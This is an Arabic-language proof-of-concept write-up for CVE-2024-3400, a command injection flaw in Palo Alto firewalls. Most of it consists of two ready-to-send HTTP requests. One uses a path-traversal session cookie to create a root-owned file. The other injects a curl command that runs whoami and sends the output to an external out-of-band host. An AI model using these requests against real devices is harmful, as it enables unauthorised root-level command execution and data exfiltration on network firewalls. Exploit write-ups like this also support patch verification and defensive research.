
إثبات مفهوم لاستغلال CVE-2024-3400، وهي ثغرة حقن أوامر في جدران حماية Palo Alto، توضح إنشاء الملفات وتنفيذ الأوامر عن بُعد عبر طلبات HTTP مصممة بعناية.
CVE-2024-3400 هي ثغرة حقن أوامر موجودة في نظام جدار الحماية Palo Alto. من خلال طلب HTTP مُصمم بعناية، يمكن للمهاجم تنفيذ أوامر ضارة على الخادم المستهدف، وحتى الحصول على صلاحيات root.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
بعد إرسال هذا الطلب، سيتم إنشاء ملف باسم hellome1337.txt على الخادم، وسيمتلك هذا الملف صلاحيات root.
توضح لقطات الشاشة تأثير عملية استغلال هذه الثغرة:


لاستغلال هذه الثغرة لتنفيذ حقن أوامر، يمكنك إرسال طلب HTTP التالي:
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
سينفذ هذا الطلب أمر whoami على الخادم، وسيرسل النتيجة إلى الخادم البعيد المحدد (على سبيل المثال: xxxxxxxxxxxxxxxxx.oast.fun).